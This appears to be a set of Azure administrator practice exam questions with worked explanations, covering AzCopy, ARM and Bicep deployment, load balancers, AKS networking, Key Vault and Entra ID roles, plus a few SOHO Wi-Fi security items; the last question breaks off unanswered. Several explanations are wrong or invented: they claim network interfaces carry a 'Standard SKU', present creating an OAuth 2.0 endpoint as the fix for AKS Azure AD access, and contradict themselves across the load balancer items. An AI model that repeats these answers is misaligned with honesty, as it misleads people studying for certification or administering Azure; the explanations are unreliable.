AzCopy is a command-line tool used to copy data to and from Azure Storage. It supports copying data to specific storage services within an Azure Storage account. The two storage services that AzCopy supports for data transfer are: Azure Blob Storage (for unstructured data like images, videos, and backups) and Azure File Storage (for file shares and network file systems). Why Only Blob and File Storage? Azure Blob Storage: AzCopy supports uploading, downloading, and copying blobs (Block blobs, Append blobs, and Page blobs). Useful for backup, archival, and serving large-scale unstructured data. Azure File Storage: AzCopy allows transferring files to and from Azure file shares. Used for network-attached storage (NAS) scenarios, application sharing, and lift-and-shift migrations. Why Other Options Are Incorrect? (b) Blob, Table, and Queue only: Table storage and Queue storage do not support AzCopy. Table and Queue storage manage structured and messaging data, not files or blobs. (c) File and Table only: Table storage is not supported for AzCopy. Only File and Blob storage can be used. (d) Blob, File, Table, and Queue: AzCopy does not support Table or Queue storage. Only Blob and File storage are valid options. (e) File only: Blob storage is also supported, making this answer incorrect.
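For example (the container name, share name, local path, and SAS token are placeholders), AzCopy targets the blob and file endpoints of storage1 like this:
# Copy a local folder to a blob container in storage1.
azcopy copy "C:\local\data" "https://storage1.blob.core.windows.net/container1?<SAS-token>" --recursive
# Copy the same folder to an Azure file share in storage1.
azcopy copy "C:\local\data" "https://storage1.file.core.windows.net/share1?<SAS-token>" --recursive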
You plan to deploy an Azure virtual machine based on a basic template stored in the Azure Resource Manager (ARM) library. What can you configure during the deployment of the template? Select only one answer.
the disk assigned to a virtual machine
the operating system
the resource group
the size of the virtual machine
When deploying an Azure Virtual Machine (VM) from an Azure Resource Manager (ARM) template, you can configure several parameters. However, some configurations are fixed within the template, while others can be customized at deployment time. One of the key configurations you can define during deployment is the disk assigned to the VM. Why is "Disk Assigned to Virtual Machine" the Correct Answer? ARM Templates Support Disk Configuration: When deploying a VM via an ARM template, you can specify: OS disk type (Premium SSD, Standard SSD, Standard HDD, etc.), size of the OS disk, and additional data disks. These parameters can be modified before deployment, making the disk configuration flexible. Storage Account or Managed Disks: You can configure the disk type and whether it should use Azure Managed Disks or unmanaged disks. You can also attach existing disks or create new ones dynamically. Why Are Other Options Incorrect? (b) The Operating System: The OS is predefined in the template when the VM image is selected. If the template is designed for Windows, you cannot change it to Linux at deployment time without modifying the template itself. (c) The Resource Group: The resource group must be defined before deployment, and while you can choose where to deploy resources, it is not a configurable setting inside the ARM template itself. (d) The Size of the Virtual Machine: The VM size (SKU) is typically pre-defined within the template. You can modify it before deployment by editing the template, but the deployment process itself does not allow for changing the VM size dynamically.
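As a sketch of how such values are supplied at deployment time (the template file name and the parameter names are hypothetical and depend on what the template exposes):
# Deploy the ARM template to a resource group, overriding disk-related parameters.
az deployment group create \
  --resource-group RG1 \
  --template-file azuredeploy.json \
  --parameters osDiskType=Premium_LRS dataDiskSizeGB=128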
You have an Azure subscription that contains a resource group named RG1. You plan to create a storage account named storage1. You have a Bicep file named File1. You need to modify File1 so that it can be used to automate the deployment of storage1 to RG1. Which property should you modify?
scope
kind
sku
location
When deploying Azure resources using Bicep, you must ensure that the deployment is correctly targeted to a specific resource group, subscription, or management group. This is defined using the scope property. Since you are deploying the storage1 account to the RG1 resource group, you must modify the scope in File1 to ensure the Bicep file correctly places the storage account in the intended resource group. Why is "Scope" the Correct Answer? Scope Defines Where the Resource Will Be Deployed: In Bicep, scope determines where the resource is deployed. Since you want to deploy storage1 to RG1, you must ensure that the Bicep file correctly targets this resource group. Example of setting the scope in a Bicep file: targetScope = 'resourceGroup' Incorrect Scope Leads to Deployment Failure: If the scope is not set properly, the deployment might fail or deploy the resource to the wrong location (e.g., the subscription level instead of a resource group). Ensuring the correct resource group scope allows automation to work as intended. Why Are Other Options Incorrect? (b) Kind: The kind property defines the type of storage account (BlobStorage, StorageV2, FileStorage). While this is important for functionality, it does not determine where the storage account is deployed. (c) SKU: The SKU property defines the performance tier of the storage account (e.g., Standard_LRS, Premium_LRS). It does not control the resource's placement or automation deployment. (d) Location: The location property defines the Azure region (e.g., eastus, westus), but not the resource group where the storage account is deployed. While location is necessary, it does not control deployment automation to the correct resource group.
You have an Azure subscription that contains the virtual machines shown in the following table. You deploy a load balancer that has the following configurations: a) Name: LB1 b) Type: Internal c) SKU: Standard d) Virtual network: VNET1 You need to ensure that you can add VM1 and VM2 to the backend pool of LB1. Solution: You create a Basic SKU public IP address, associate the address to the network interface of VM1, and then start VM1. Does this meet the goal?
Yes
No
The solution does not meet the goal because: Load Balancer SKU Mismatch (Standard vs. Basic) LB1 is a Standard SKU Load Balancer, but the proposed solution associates a Basic SKU Public IP to VM1. Standard Load Balancers require VMs to have a Standard SKU Public IP or no Public IP at all. Basic SKU Public IPs are not compatible with Standard Load Balancers. Stopped (Deallocated) VM Issue VM1 is in a Stopped (Deallocated) state, meaning it is not active on the network. Even if a public IP is assigned, VM1 must be running to be added to the backend pool. Internal Load Balancer (No Public IP Needed) LB1 is an Internal Load Balancer, meaning it does not use Public IPs at all. Assigning a Public IP to VM1 does not help in configuring the backend pool for an Internal Load Balancer. The VMs should be in the same Virtual Network (VNET1) without requiring Public IPs. Correct Approach: To add VM1 and VM2 to the backend pool of LB1, you should: Ensure both VMs are running (Start VM1). Ensure both VMs are in the same Virtual Network (VNET1). Do not associate a Public IP (Public IPs are not needed for an Internal Load Balancer). Ensure both VMs have a Standard SKU Network Interface (to be compatible with a Standard SKU Load Balancer).
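For illustration only, once both VMs are running and use NICs compatible with the Standard SKU, each NIC's IP configuration can be added to the LB1 backend pool from the Azure CLI; the resource group, NIC, IP configuration, and pool names below are assumptions:

# Add VM1's NIC IP configuration to the LB1 backend pool (names are hypothetical).
az network nic ip-config address-pool add \
  --resource-group RG1 \
  --nic-name vm1-nic \
  --ip-config-name ipconfig1 \
  --lb-name LB1 \
  --address-pool LB1-backend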
You have an Azure subscription that contains the virtual machines shown in the following table. You deploy a load balancer that has the following configurations: a) Name: LB1 b) Type: Internal c) SKU: Standard d) Virtual network: VNET1 You need to ensure that you can add VM1 and VM2 to the backend pool of LB1. Solution: You disassociate the public IP address from the network interface of VM2. Does this meet the goal?
Yes
No
The proposed solution does not meet the goal because disassociating the public IP address from VM2 alone is not enough to add VM1 and VM2 to the backend pool of LB1. Key Issues with the Solution: Load Balancer SKU Mismatch (Standard vs. Basic) LB1 is a Standard SKU Load Balancer. Standard Load Balancers require all backend VMs to have Standard SKU network interfaces (NICs) and Standard SKU Public IPs (if any). VM2 currently has a Basic SKU Public IP, which is incompatible with Standard Load Balancers. Simply disassociating the Public IP does not upgrade the NIC to Standard SKU. VM1 is Stopped (Deallocated) VM1 is currently deallocated, meaning it is not active on the network and cannot be added to the backend pool. The VM must be started first before it can participate in the backend pool. Internal Load Balancer Does Not Require Public IPs Since LB1 is an Internal Load Balancer, public IPs are not needed at all for backend VMs. However, simply removing the Public IP from VM2 does not ensure it meets all the requirements for being added to an Internal Standard Load Balancer. Correct Approach to Fix the Issue: To successfully add VM1 and VM2 to the backend pool of LB1, you need to: Start VM1 (so it becomes active and available on the network). Ensure both VMs have network interfaces with Standard SKU (not Basic). Ensure both VMs do not have incompatible Basic SKU Public IPs (either remove them or replace them with Standard SKU Public IPs if needed). Ensure both VMs are in the same Virtual Network (VNET1).
You have an Azure subscription that contains the virtual machines shown in the following table. You deploy a load balancer that has the following configurations: a) Name: LB1 b) Type: Internal c) SKU: Standard d) Virtual network: VNET1 You need to ensure that you can add VM1 and VM2 to the backend pool of LB1. Solution: You create a Standard SKU public IP address, associate the address to the network interface of VM1, and then stop VM2. Does this meet the goal?
Yes
No
The proposed solution does not meet the goal because adding a Standard SKU public IP to VM1 and stopping VM2 does not resolve the key requirements for adding both VMs to the backend pool of LB1. Key Issues with the Solution: Stopping VM2 Removes It from the Network: VM2 needs to be running to be added to the backend pool. Stopping VM2 prevents it from being part of the load balancer’s backend pool. The solution should ensure both VMs are running, not stopped. Public IP Address is Not Required for an Internal Load Balancer: LB1 is an Internal Load Balancer, which means it is used for private communication within the virtual network (VNET1). Internal Load Balancers do not require public IPs on backend VMs. Associating a Standard SKU Public IP to VM1 does not help in adding it to the backend pool. VM1 Must Be Running: VM1 is currently stopped (deallocated). Even if a Standard SKU Public IP is added, VM1 must be started to be added to the backend pool. Load Balancer SKU Compatibility: Standard Load Balancers require all backend VMs to use Standard SKU network interfaces (NICs). While adding a Standard SKU Public IP ensures compatibility with the Load Balancer, it is not a required step for an Internal Load Balancer. Correct Approach to Fix the Issue: To successfully add VM1 and VM2 to the backend pool of LB1, you should start VM1 (so it becomes active on the network), ensure both VMs have network interfaces compatible with the Standard SKU (not Basic), ensure both VMs are in the same virtual network (VNET1), and ensure VM2 remains running.
You are configuring a network and router for a SOHO company. There are wired and wireless connections to the router. What is NOT a way to secure the router and network?
Disable any guest accounts on the network. If guests need access, set up a separate VPN for them.
Ensure that the Wi-Fi signal doesn’t extend beyond the required area, and if it does, lower the power of the Wi-Fi signal.
Place the router in the kitchen area for easy access.
Place the router in an area that can be locked.
Placing the router in the kitchen area for easy access is not a secure practice. Routers should be placed in physically secure locations, preferably where access can be controlled or locked, to prevent unauthorized physical tampering or resets. Why the other options are good security practices: Disabling guest accounts and setting up separate VPN access for guests ensures that unauthorized users can’t access sensitive network resources. Adjusting the Wi-Fi signal range helps prevent the signal from reaching outside the physical premises, reducing the chance of external attacks. Locking up the router prevents physical tampering or unauthorized reset attempts. Keeping the router in a common, easily accessible area like a kitchen may be convenient, but it compromises physical network security.
You have an Azure subscription that contains the virtual machines shown in the following table. You deploy a load balancer that has the following configurations: a) Name: LB1 b) Type: Internal c) SKU: Standard d) Virtual network: VNET1 You need to ensure that you can add VM1 and VM2 to the backend pool of LB1. Solution: You create two Standard SKU public IP addresses and associate a Standard SKU public IP address to the network interface of each virtual machine. Does this meet the goal?
Yes
No
The solution does not meet the goal. LB1 is an Internal Load Balancer, so public IP addresses are not used for its backend pool, and associating Standard SKU public IPs with the VMs does not satisfy the requirements. Instead, ensure VM1 is running before adding it to the backend pool, upgrade the network interfaces (NICs) of VM1 and VM2 to be compatible with the Standard SKU, and do not assign public IPs, because they are not needed for an Internal Load Balancer.
You have an Azure subscription that contains a resource group named RG1. RG1 contains an Azure virtual machine named VM1. You need to use VM1 as a template to create a new Azure virtual machine. Which three methods can you use to complete the task? Each correct answer presents a complete solution. Select all answers that apply.
From Azure Cloud Shell, run the Get-AZVM and New-AzVM cmdlets.
From Azure Cloud Shell, run the Save-AzDeploymentScriptLog and New-AzResourceGroupDeployment cmdlets.
From Azure Cloud Shell, run the Save-AzDeploymentTemplate and New-AzResourceGroupDeployment cmdlets.
From RG1, select Export template, select Download, and then, from Azure Cloud Shell, run the New-AzResourceGroupDeployment cmdlet
From VM1, select Export template, and then select Deploy.
To create a new Azure virtual machine (VM) from an existing VM, you need to capture the configuration of the existing VM and use it to deploy a new instance. The correct approach is: Export the template from the Resource Group (RG1): The Export template option allows you to generate an Azure Resource Manager (ARM) template that contains all the necessary configurations for VM1. Download the template: This template includes the VM’s settings such as size, OS disk, networking, and storage configuration. Deploy the new VM using Azure Cloud Shell: Using the New-AzResourceGroupDeployment cmdlet, you can deploy a new VM using the exported ARM template. Why This Works: ARM templates allow for infrastructure as code, enabling you to redeploy resources in a repeatable way. The New-AzResourceGroupDeployment cmdlet is specifically designed to deploy resources based on an ARM template. This method ensures that the new VM matches the original VM’s configuration exactly, making it ideal for cloning or creating consistent environments. Other Options Analysis: Get-AzVM and New-AzVM (Option A): Incorrect because Get-AzVM retrieves VM properties but does not capture the entire VM configuration for redeployment. New-AzVM is used for creating VMs but requires manual configuration, making it less efficient. Save-AzDeploymentScriptLog and New-AzResourceGroupDeployment (Option B): Incorrect because Save-AzDeploymentScriptLog is used for saving deployment logs, not for exporting VM configurations. Save-AzDeploymentTemplate and New-AzResourceGroupDeployment (Option C): Partially correct but not the best answer. Save-AzDeploymentTemplate is used to capture deployment details, but it is not the standard method for exporting VM templates. Exporting from RG1 is the recommended way. Export template from VM and Deploy (Option E): Incorrect because exporting from the VM blade does not provide a full ARM template that includes networking and storage settings. The correct approach is exporting the template from the resource group (RG1) since it contains all dependencies.
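If you prefer the Azure CLI over the PowerShell cmdlets, a comparable and purely illustrative flow exports the ARM template for RG1 and then redeploys it; the output file name is an assumption:

# Export the ARM template for RG1, then redeploy it from the exported file.
az group export --name RG1 > vm1-template.json
az deployment group create --resource-group RG1 --template-file vm1-template.json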
How many resource groups are created for each AKS deployment?
1
2
3
4
When you deploy an Azure Kubernetes Service (AKS) cluster, two resource groups are created automatically. 1) The Resource Group You Specify: This is the resource group where the AKS cluster is deployed. It contains the Kubernetes control plane components and other AKS-related resources. You manually specify this resource group when creating the AKS cluster. 2) The Managed Resource Group (Auto-Created): Azure automatically creates a second resource group to manage infrastructure resources such as virtual machines (VMs) for worker nodes, networking resources (load balancer, public IPs, virtual network, etc.), and disks and storage accounts. The name of this resource group follows the format MC_<resourceGroupName>_<clusterName>_<location>.
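For an existing cluster, you can confirm the name of the auto-created managed resource group by querying its nodeResourceGroup property; the cluster and resource group names below are illustrative:

# Show the name of the managed (MC_...) resource group created for AKS1.
az aks show --resource-group RG1 --name AKS1 --query nodeResourceGroup --output tsv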
You deploy an Azure Kubernetes Service (AKS) cluster that has the network profile shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. Containers will be assigned an IP address in the ______ subnet
10.244.0.0/16
10.0.0.0/16
172.17.0.1/16
In an Azure Kubernetes Service (AKS) cluster, the Pod CIDR (Classless Inter-Domain Routing) defines the IP range for pod networking. Looking at the network profile, we see the following configuration: Pod CIDR: 10.244.0.0/16 Service CIDR: 10.0.0.0/16 DNS Service: 10.0.0.10 Docker Bridge CIDR: 172.17.0.1/16 Why is the correct answer 10.244.0.0/16? Pod CIDR (10.244.0.0/16) is specifically assigned to pods running inside AKS. Each pod in the cluster will be assigned an IP from this range. Service CIDR (10.0.0.0/16) is for internal Kubernetes services (e.g., ClusterIP services). Docker Bridge CIDR (172.17.0.1/16) is used for the Docker network, which is separate from the AKS Pod IPs.
You deploy an Azure Kubernetes Service (AKS) cluster that has the network profile shown in the following exhibit. Use the drop-down menus to select the answer choice that completes each statement based on the information presented in the graphic. Services in the AKS cluster will be assigned an IP address in the ______ subnet
10.244.0.0/16
10.0.0.0/16
172.17.0.1/16
In Azure Kubernetes Service (AKS), the Service CIDR defines the IP range used for Kubernetes services such as ClusterIP, LoadBalancer, and NodePort services. Looking at the network profile, we see the following configurations: Pod CIDR: 10.244.0.0/16 (used for pod networking) Service CIDR: 10.0.0.0/16 (used for Kubernetes services) DNS Service IP: 10.0.0.10 (an IP from the Service CIDR) Docker Bridge CIDR: 172.17.0.1/16 (used for Docker networking) Why is the correct answer 10.0.0.0/16? Kubernetes Services (like ClusterIP, LoadBalancer, and NodePort) need a separate IP range to avoid conflicts with Pod IPs. The Service CIDR (10.0.0.0/16) is used to allocate IP addresses for these services. For example, the Cluster DNS service (10.0.0.10) is assigned from this Service CIDR.
You have an Azure subscription that contains an Azure Active Directory (Azure AD) tenant named contoso.com and an Azure Kubernetes Service (AKS) cluster named AKS1. An administrator reports that she is unable to grant access to AKS1 to the users in contoso.com. You need to ensure that access to AKS1 can be granted to the contoso.com users. What should you do first?
From AKS1, create a namespace
From contoso.com, create an OAuth 2.0 authorization endpoint
Recreate AKS1
From contoso.com, modify the Organization relationships settings
The administrator is unable to grant access to the Azure Kubernetes Service (AKS) cluster named AKS1 to users in contoso.com (Azure AD tenant). This issue typically occurs because AKS integrates with Azure AD for authentication, and an OAuth 2.0 authorization endpoint is required for Azure AD to handle authentication requests. Why Creating an OAuth 2.0 Authorization Endpoint is the Solution: AKS Uses Azure AD for Authentication: AKS can integrate with Azure AD to allow role-based access control (RBAC). Users in contoso.com need to authenticate using Azure AD before accessing AKS. OAuth 2.0 Authorization Endpoint Enables Authentication: The OAuth 2.0 authorization endpoint allows AKS to redirect users to Azure AD for login. Without this, AKS cannot authenticate users, preventing access control. How to Create the Authorization Endpoint in Azure AD: Navigate to Azure Portal > Microsoft Entra ID (Azure AD) > App registrations. Register an application for AKS authentication. Azure AD will generate an OAuth 2.0 authorization endpoint in this format: https://login.microsoftonline.com/{tenant_id}/oauth2/v2.0/authorize This endpoint will be used to authenticate users before granting access to AKS1.
You are creating an Azure virtual machine that will run Windows Server. As an Azure admin, you must ensure that VM1 will be part of a virtual machine scale set. Which setting should you configure during the creation of the virtual machine?
Availability options
Azure Spot instance
Management
Region
When creating an Azure Virtual Machine (VM) that will be part of a Virtual Machine Scale Set (VMSS), you need to configure the Availability options setting. Azure provides different availability configurations, including: No infrastructure redundancy required: The VM is not part of any high-availability setup. Availability set: Ensures VMs are distributed across multiple fault and update domains for redundancy. Virtual machine scale set: Ensures the VM is part of a scale set, allowing Azure to scale instances based on demand automatically. Since you specifically want VM1 to be part of a virtual machine scale set, you must choose the virtual machine scale set option under Availability options during VM creation. This ensures that the VM is deployed within a scale set, enabling automatic scaling, load balancing, and high availability. Why not the other options? (b) Azure Spot instance: This setting is used for cost-saving purposes by running the VM on unused Azure capacity but does not configure a scale set. (c) Management: This setting allows enabling monitoring, backup, and auto-shutdown but does not control scale-set membership. (d) Region: Determines where the VM is deployed but does not configure its availability settings. Thus, to make sure VM1 is part of a Virtual Machine Scale Set, the Availability options setting must be configured correctly.
You have an Azure subscription that contains a virtual machine named VM1 and a storage account named storage1. You need to ensure that VM1 can access storage1 by using the Azure backbone. What should you configure?
VPN gateway
Peering
a service endpoint
a routing table
Azure Virtual Network (VNet) Service Endpoints allow virtual machines (VMs) in a VNet to securely access Azure services, such as Azure Storage, over the Azure backbone network instead of routing traffic over the public internet. By enabling a service endpoint for Azure Storage on the subnet where VM1 is located, the network traffic between VM1 and storage1 remains within Azure’s private network. This improves security, reduces latency, and provides better reliability. Why not the other options? (a) VPN Gateway – A VPN gateway connects on-premises networks to Azure over the public internet, not needed for communication between an Azure VM and an Azure storage account. (b) Peering – Virtual network peering connects two VNets, but it does not provide direct access to Azure Storage over the Azure backbone. (d) Routing Table – A routing table controls how traffic flows within a network but does not enable private access to Azure services.
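A minimal sketch of enabling the endpoint on the subnet that hosts VM1; the virtual network, subnet, and resource group names here are assumptions:

# Enable the Microsoft.Storage service endpoint on VM1's subnet.
az network vnet subnet update \
  --resource-group RG1 \
  --vnet-name VNET1 \
  --name Subnet1 \
  --service-endpoints Microsoft.Storage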
Your office is located in a building with a number of other companies. How should you configure the wireless network to prevent casual users in the building from seeing your network name easily?
Enable WPA3.
Disable SSID broadcasts.
Reduce radio power levels.
Enable MAC filtering.
The SSID (Service Set Identifier) is the name of your wireless network. By disabling SSID broadcasts, you prevent your network name from appearing in the list of available Wi-Fi networks that people see when scanning nearby connections. This can help deter casual or opportunistic users from trying to connect, though it is not a strong security measure by itself, as the SSID can still be detected with network sniffing tools. Why the other options are not correct for this specific purpose: Enable WPA3: This improves security for users who connect, but doesn’t hide the network name. Reduce radio power levels: This limits range, which might reduce visibility, but doesn’t make the network invisible and can impact legitimate access. Enable MAC filtering: This restricts which devices can connect, but again, does not hide the SSID. So, to make your network less visible, disabling SSID broadcast is the most direct and relevant step.
You have an Azure subscription that contains 100 virtual machines. You regularly create and delete virtual machines. You need to identify unattached disks that can be deleted. What should you do?
From Azure Cost Management, view Cost Analysis
From Azure Advisor, modify the Advisor configuration
From Microsoft Azure Storage Explorer, view the Account Management properties
From Azure Cost Management, view Advisor Recommendations
Azure provides Advisor Recommendations as part of Azure Cost Management, which helps identify unused or underutilized resources, including unattached disks. When you create and delete virtual machines (VMs) frequently, their managed disks may not be automatically deleted when a VM is removed. These orphaned disks continue to incur costs, even though they are not attached to any active VM. By navigating to Azure Cost Management > Advisor Recommendations, you can: Identify unused managed disks that are no longer attached to any VM. Get recommendations to delete or move these disks to save costs. Optimize your Azure storage usage. Why not the other options? (a) From Azure Cost Management, view Cost Analysis Cost Analysis provides spending insights but does not specifically identify unattached disks. (b) From Azure Advisor, modify the Advisor configuration Modifying Advisor settings lets you customize recommendations but does not directly show unattached disks. (c) From Microsoft Azure Storage Explorer, view the Account Management properties Storage Explorer is useful for managing storage accounts but does not automatically identify unused disks.
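Alongside Advisor, a quick ad-hoc check is possible from the Azure CLI: unattached managed disks have an empty managedBy property. A sketch:

# List managed disks that are not attached to any VM.
az disk list --query '[?managedBy==`null`].{name:name, resourceGroup:resourceGroup}' --output table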
You have an Azure subscription that contains a virtual machine named VM1. VM1 requires volume encryption for the operating system and data disks. You create an Azure key vault named vault1. You need to configure vault1 to support Azure Disk Encryption for volume encryption. Which setting should you modify for vault1?
Keys
Secrets
Access policies
Security
Azure Disk Encryption (ADE) uses Azure Key Vault to store encryption keys and secrets. To allow VM1 to use vault1 for volume encryption, the Key Vault access policies must be configured to grant Azure Disk Encryption permissions. When you configure Access policies in vault1, you need to: Assign the correct permissions to allow the VM to access encryption keys and secrets. Grant the necessary roles (such as “Key Vault Crypto Service Encryption User”) to the Azure Disk Encryption service. Ensure that VM1 or the service principal it uses has the correct read and write access to encryption keys. Why not the other options? (a) Keys – This stores encryption keys, but modifying keys alone does not grant the required permissions to enable disk encryption. (b) Secrets – Secrets store credentials, but Azure Disk Encryption requires access policy settings, not just secrets. (d) Security – This setting includes general security configurations like firewalls and access control, but it does not specifically enable disk encryption.
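As a hedged sketch, the vault's disk-encryption access must be enabled before ADE can use it, after which encryption can be turned on for both volume types; the resource group name is an assumption:

# Allow Azure Disk Encryption to retrieve secrets and unwrap keys from vault1.
az keyvault update --name vault1 --resource-group RG1 --enabled-for-disk-encryption true
# Enable encryption on both the OS and data disks of VM1.
az vm encryption enable --resource-group RG1 --name VM1 --disk-encryption-keyvault vault1 --volume-type ALL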
You have an Azure subscription that contains several hundred virtual machines. You need to identify which virtual machines are underutilized. What should you use?
Azure Advisor
Azure Monitor
Azure Policies
Azure recommendations
Azure Advisor is a personalized cloud consultant that helps you follow best practices to optimize your Azure deployments. It analyzes your resource configuration and usage telemetry and then recommends solutions that can help you improve the cost effectiveness, performance, reliability, and security of your Azure resources. With Advisor, you get proactive, actionable, and personalized best-practice recommendations, including cost recommendations that identify underutilized virtual machines.
You have a Microsoft Entra ID tenant named contoso.com. You need to ensure that a user named User1 can review all the settings of the tenant. User1 must be prevented from changing any settings. Which role should you assign to User1?
Directory reader
Security reader
Reports reader
Global reader
The Global Reader role in Microsoft Entra ID (formerly Azure AD) allows a user to view all settings and administrative information in the tenant without making any changes. Since you need User1 to review all tenant settings but prevent them from modifying anything, the Global Reader role is the best fit. Why Global Reader? Read-only access to all administrative settings in Microsoft Entra ID. Can view security policies, user properties, groups, and configurations without the ability to edit them. Suitable for auditors, compliance officers, or administrators who need oversight but no modification rights. Why not the other options? (a) Directory Reader: Can view user, group, and directory information but not all settings of the tenant. Does not provide access to security, policy, or admin settings. (b) Security Reader: Can view security-related information such as reports, alerts, and security configurations. Does not provide access to all tenant settings. (c) Reports Reader: Can view usage and analytics reports for Entra ID and Microsoft 365. Cannot review tenant settings.
You have a Microsoft Entra ID tenant named contoso.com. You deploy a development Entra ID tenant, and then you create several custom administrative roles in the development tenant. You need to copy the roles to the production tenant. What should you do first?
From the development tenant, export the custom roles to JSON
From the production tenant, create a new custom role.
From the development tenant, perform a backup.
From the production tenant, create an administrative unit
Microsoft Entra ID allows you to create custom administrative roles in one tenant and reuse them in another tenant (such as a production environment). Since you need to copy the custom roles from the development tenant to the production tenant, you must first export them to a JSON file. This process involves: Exporting the custom roles from the development tenant in JSON format using the Microsoft Graph API or PowerShell. Importing the JSON file into the production tenant to recreate the roles. This method ensures that all role permissions and configurations remain consistent across tenants. Why not the other options? (b) From the production tenant, create a new custom role: This would require manually recreating each role from scratch, which is inefficient and prone to errors. Instead, exporting and importing JSON ensures exact replication. (c) From the development tenant, perform a backup: Backing up the tenant does not provide a way to export and transfer specific custom roles to another tenant. (d) From the production tenant, create an administrative unit: Administrative units are used for scoping role assignments within a tenant but do not help copy custom roles between tenants.
Your company has a Microsoft Entra ID subscription. You need to deploy five virtual machines (VMs) to your company’s virtual network subnet. The VMs will each have both a public and private IP address. Inbound and outbound security rules for all of these virtual machines must be identical. Which of the following is the least amount of network interfaces needed for this configuration?
5
10
20
25
Each Azure Virtual Machine (VM) requires at least one network interface (NIC) to connect to a Virtual Network (VNet). In this scenario, each VM needs: A private IP address (for internal communication within the VNet). A public IP address (for external internet access). However, Azure allows a single NIC to have both a private and a public IP address. This means that each VM can have one NIC, one private IP, and one public IP. Since you need 5 VMs, and each VM requires only one NIC to support both IPs, the minimum number of NICs needed is 5. Why not the other options? (b) 10: This would mean assigning two NICs per VM, which is unnecessary since a single NIC can support both public and private IPs. (c) 20: This would require four NICs per VM, which is excessive and not required in this scenario. (d) 25: This would mean five NICs per VM, which is far more than needed.
Your company has a Microsoft Entra ID subscription. You need to deploy five virtual machines (VMs) to your company’s virtual network subnet. The VMs will each have both a public and private IP address. Inbound and outbound security rules for all of these virtual machines must be identical. Which of the following is the least amount of security groups needed for this configuration?
1
5
7
10
In Azure, Network Security Groups (NSGs) are used to control inbound and outbound traffic for virtual machines (VMs) by defining security rules. Since all five VMs require identical security rules, you can use a single NSG and associate it with the subnet or NICs of the VMs. Why only 1 NSG? NSGs can be applied at the subnet level in a Virtual Network (VNet). If you associate one NSG with the subnet, all five VMs in the subnet inherit the same security rules. This ensures consistent security policies for all VMs without needing multiple NSGs. Why not the other options? (b) 5: This would mean one NSG per VM, which is unnecessary because a single NSG applied at the subnet level can cover all VMs. (c) 7: No scenario justifies using seven NSGs, as all VMs require identical rules. (d) 10: This would mean two NSGs per VM, which is excessive and redundant.
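A brief sketch, with hypothetical names, of creating one NSG and attaching it at the subnet level so all five VMs inherit the same inbound and outbound rules:

# Create a single NSG and associate it with the subnet that hosts the five VMs.
az network nsg create --resource-group RG1 --name WebTierNsg
az network vnet subnet update \
  --resource-group RG1 \
  --vnet-name VNET1 \
  --name Subnet1 \
  --network-security-group WebTierNsg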
You have an Azure subscription that contains several Azure runbooks. The runbooks run nightly and generate reports. The runbooks are configured to store authentication credentials as variables. You need to replace the authentication solution with a more secure solution. What should you use?
Azure Active Directory (Azure AD) Identity Protection
Azure Key Vault
an access policy
an administrative unit
Azure Key Vault is a secure storage solution for secrets, certificates, and encryption keys in Azure. Since the runbooks are currently storing authentication credentials as variables, this method is not secure because: Variables are stored in plain text, which makes them vulnerable to unauthorized access. If an attacker gains access to the runbook, they can extract credentials. By using Azure Key Vault, you can: Securely store authentication credentials instead of keeping them as variables. Restrict access using role-based access control (RBAC) and managed identities. Automatically retrieve credentials when needed without exposing them in the runbook. This ensures that authentication credentials remain secure while allowing runbooks to function normally. Why not the other options? (a) Azure Active Directory (Azure AD) Identity Protection: Identity Protection detects and prevents identity-related security risks (e.g., detecting compromised accounts) but does not store secrets securely. (c) An access policy: Access policies define permissions for resources like Key Vault, but they do not store credentials. You need a secure storage solution (Key Vault) first, and then you can configure access policies for it. (d) An administrative unit: Administrative units are used to scope Entra ID (Azure AD) role assignments, but they do not manage authentication credentials.
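For illustration, the credential can be stored once in Key Vault and read back at run time (ideally by the runbook's managed identity rather than an embedded credential); the vault and secret names are assumptions:

# Store the credential as a Key Vault secret instead of a runbook variable.
az keyvault secret set --vault-name vault1 --name ReportSqlPassword --value '<password>'
# At run time, retrieve the secret value (e.g., from the runbook's identity).
az keyvault secret show --vault-name vault1 --name ReportSqlPassword --query value --output tsv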
You administer a solution in Azure that is currently having performance issues. You need to find the cause of the performance issues about metrics on the Azure infrastructure. Which of the following is the tool you should use?
Azure Traffic Analytics
Azure Monitor
Azure Activity Log
Azure Advisor
Azure Monitor is the primary tool for collecting, analyzing, and visualizing metrics and logs related to Azure infrastructure and performance. Since you need to investigate performance issues, Azure Monitor provides: Metrics tracking (CPU, memory, disk, and network usage). Real-time monitoring to identify resource bottlenecks. Alerts and diagnostics to troubleshoot issues efficiently. Azure Monitor gathers data from Azure resources, applications, and virtual machines and helps detect performance degradation in services. Why not the other options? (a) Azure Traffic Analytics: Traffic Analytics focuses on network traffic flow analysis, but it does not provide general performance metrics for Azure resources. (c) Azure Activity Log: The Activity Log records management operations (such as VM start/stop events) but does not track performance metrics. (d) Azure Advisor: Azure Advisor provides best-practice recommendations for cost, security, and performance, but it does not offer real-time performance monitoring like Azure Monitor.
Google Chrome occasionally displays a pop-up window in front of your browser when you visit websites. Typically, it’s an advertisement aiming to persuade you to buy something. What should you do to prevent this from occurring?
Install an antivirus program.
Install an anti-malware program.
Enable Chrome’s pop-up blocker.
Enable Windows Firewall.
To prevent pop-up ads from appearing in Google Chrome, you should enable Chrome’s built-in pop-up blocker. Here’s why this is the best solution: Pop-up blocker: Google Chrome has an integrated pop-up blocker that is designed to stop unwanted pop-up windows (like advertisements) from appearing while you browse. This is the most direct and effective solution to control pop-up ads. Customization: The pop-up blocker in Chrome can be configured to block pop-ups for all sites or just specific sites. By default, Chrome blocks pop-ups from sites that are not on the allowed list. Why the other options are incorrect: Install an antivirus program: Antivirus software helps protect your system from viruses and malware, but it does not specifically target or block pop-up ads from websites. Pop-up blockers in browsers are better suited for this task. Install an anti-malware program: Similar to antivirus software, anti-malware programs can protect against malicious software but do not typically block pop-ups, which are often not malware-related. A pop-up blocker is a more direct solution. Enable Windows Firewall: Windows Firewall protects your system from unauthorized incoming and outgoing network traffic, but it does not block pop-ups within web browsers. The firewall is designed for network security, not for controlling web content like pop-ups. Conclusion: The best solution to prevent pop-ups in Google Chrome is to enable Chrome’s pop-up blocker. This feature specifically addresses unwanted pop-ups and ads while you are browsing.
Your company has a Microsoft SQL Server Always On availability group configured on their Azure virtual machines (VMs). You need to configure an Azure internal load balancer as a listener for the availability group. Solution: You create an HTTP health probe on port 1433. Does the solution meet the goal?
Yes
No
